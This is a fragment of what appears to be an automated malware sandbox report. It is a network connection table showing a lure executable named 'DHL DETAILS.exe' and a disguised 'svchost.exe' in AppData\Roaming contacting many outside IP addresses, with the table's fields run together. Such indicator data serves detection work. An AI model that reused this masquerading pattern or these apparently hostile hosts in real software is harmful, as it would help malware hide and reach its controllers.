                                                                                    6075192.168.2.55216896.80.235.180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6076192.168.2.558117110.74.195.2395108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6077192.168.2.565005116.68.162.82808043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6078192.168.2.565063138.197.148.2158056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6079192.168.2.558325104.19.233.1178043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6080192.168.2.565140146.56.146.54838456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6081192.168.2.55827574.119.144.60414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6082192.168.2.55814349.4.48.128888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6083192.168.2.5581611.15.62.12567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6084192.168.2.552257162.223.89.84806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6085192.168.2.565300147.124.212.311327656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6086192.168.2.558170201.13.147.161567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6087192.168.2.558176139.224.64.191808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6088192.168.2.55237577.65.50.118341596352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6089192.168.2.558300195.248.243.149723743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6090192.168.2.558565199.102.106.94414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6091192.168.2.55817820.206.106.192812343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6092192.168.2.558463172.67.209.128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6093192.168.2.55813589.218.8.152108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6094192.168.2.558238202.131.65.1108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6095192.168.2.55218091.134.140.160164876352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6096192.168.2.552300222.252.18.8191326352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6097192.168.2.55814541.77.188.1318043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6098192.168.2.5582158.222.239.2098043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6099192.168.2.56538164.225.48.234312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6100192.168.2.552303163.172.147.89163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6101192.168.2.552207117.102.114.278906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6102192.168.2.55665141.242.116.1505000343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6103192.168.2.558142122.114.232.13780843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6104192.168.2.558354107.181.148.227608743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6105192.168.2.558339213.202.230.2418043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6106192.168.2.558343136.243.82.121108243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6107192.168.2.55841245.43.81.164581143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6108192.168.2.55855566.84.6.216264543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6109192.168.2.556976162.223.116.758043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6110192.168.2.558310138.36.150.15108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6111192.168.2.558211116.199.168.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6112192.168.2.558367118.218.126.54940043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6113192.168.2.558322139.59.1.14808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6114192.168.2.558456195.169.35.214312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6115192.168.2.5584598.217.143.1871567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6116192.168.2.565415138.121.161.86819056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6117192.168.2.557086148.66.130.532087043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6118192.168.2.55854651.15.142.41637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6119192.168.2.558444203.218.172.225808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6120192.168.2.55843782.157.194.44789043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6121192.168.2.565296212.110.188.2113440956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6122192.168.2.558479156.67.217.1598043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6123192.168.2.565438193.239.58.92808143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6124192.168.2.553184162.240.10.35504636352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6125192.168.2.55849191.134.140.1601221743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6126192.168.2.558573211.222.252.187819743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6127192.168.2.55857147.106.112.207808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6128192.168.2.558577150.109.243.1561567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6129192.168.2.558594104.19.120.848043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6130192.168.2.552781103.69.87.14231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6131192.168.2.552741185.191.236.16231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6132192.168.2.557077178.218.95.6812343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6133192.168.2.558572183.215.23.242909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6134192.168.2.565281178.49.22.23108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6135192.168.2.558438103.66.177.173225143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6136192.168.2.55293154.38.176.20036796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6137192.168.2.552354163.53.82.220326506352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6138192.168.2.55270841.57.37.12556786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6139192.168.2.557132106.105.218.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6140192.168.2.55647872.206.181.976494343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6141192.168.2.557643137.184.100.1358043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6142192.168.2.553562194.213.208.22681806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6143192.168.2.553486203.96.177.211550056352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6144192.168.2.55741936.93.138.75567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6145192.168.2.553031161.35.83.25131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6146192.168.2.557717161.97.170.2092460643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6147192.168.2.553281212.118.43.143806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6148192.168.2.55779594.131.106.196312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6149192.168.2.55744394.131.106.208312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6150192.168.2.55857827.65.114.8108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6151192.168.2.565505159.223.71.715254256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6152192.168.2.558630172.67.182.778043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6153192.168.2.558278117.160.250.163808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6154192.168.2.55861839.105.27.30312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6155192.168.2.556298112.5.33.17999943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6156192.168.2.553651147.124.212.31305086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6157192.168.2.558585219.71.216.788043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6158192.168.2.553308154.0.14.11631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6159192.168.2.557092180.250.159.49415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6160192.168.2.558355117.160.250.1338043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6161192.168.2.55864474.119.144.60414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6162192.168.2.557486211.93.2.190730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6163192.168.2.55724639.165.0.137900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6164192.168.2.565521187.40.1.12312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6165192.168.2.557805185.81.153.162338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6166192.168.2.55792346.219.1.5567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6167192.168.2.55862693.90.212.2415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6168192.168.2.549226167.99.236.148056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6169192.168.2.558628187.40.1.12212843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6170192.168.2.5579775.252.23.220108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6171192.168.2.558639103.118.46.177808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6172192.168.2.55802427.65.240.157108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6173192.168.2.558643139.129.202.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6174192.168.2.553742178.128.82.105332256352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6175192.168.2.55799851.75.126.150422843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6176192.168.2.55864849.4.48.128888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6177192.168.2.554027162.241.6.97446076352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6178192.168.2.558660201.13.147.161567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6179192.168.2.558664134.209.105.209312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6180192.168.2.549416142.54.228.193414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6181192.168.2.5586561.15.62.12567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6182192.168.2.55424488.202.230.103170456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6183192.168.2.56266554.38.176.200367956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6184192.168.2.553859154.239.9.9480806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6185192.168.2.5586778.217.143.1871567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6186192.168.2.558681203.218.172.225808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6187192.168.2.55866589.218.8.152108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6188192.168.2.558684211.222.252.187819743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6189192.168.2.558679138.36.150.15108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6190192.168.2.562648220.121.137.183312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6191192.168.2.558696193.239.58.92808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192192.168.2.55812664.227.106.1578043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6193192.168.2.558698150.109.243.1561567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6194192.168.2.55481950.63.12.33614646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6195192.168.2.558237174.136.57.1693376143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6196192.168.2.558097216.137.184.2538043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6197192.168.2.558697116.199.168.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6198192.168.2.558711202.142.159.2043102643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6199192.168.2.555101161.97.163.52641096352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6200192.168.2.557953184.170.249.65414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6201192.168.2.558700122.114.232.13780843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6202192.168.2.55505551.89.173.40179826352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6203192.168.2.55793072.195.34.58414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6204192.168.2.55478552.80.19.20731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6205192.168.2.55815372.49.49.113103443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6206192.168.2.558688115.74.157.191108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6207192.168.2.55816847.90.126.78811843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6208192.168.2.56269362.243.56.95312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6209192.168.2.55522318.167.191.22310806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6210192.168.2.558435162.240.22.1844802643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6211192.168.2.555321162.214.75.795216343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6212192.168.2.558326107.180.90.886408143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6213192.168.2.558342128.199.221.911753243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6214192.168.2.558454162.214.164.2004262443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


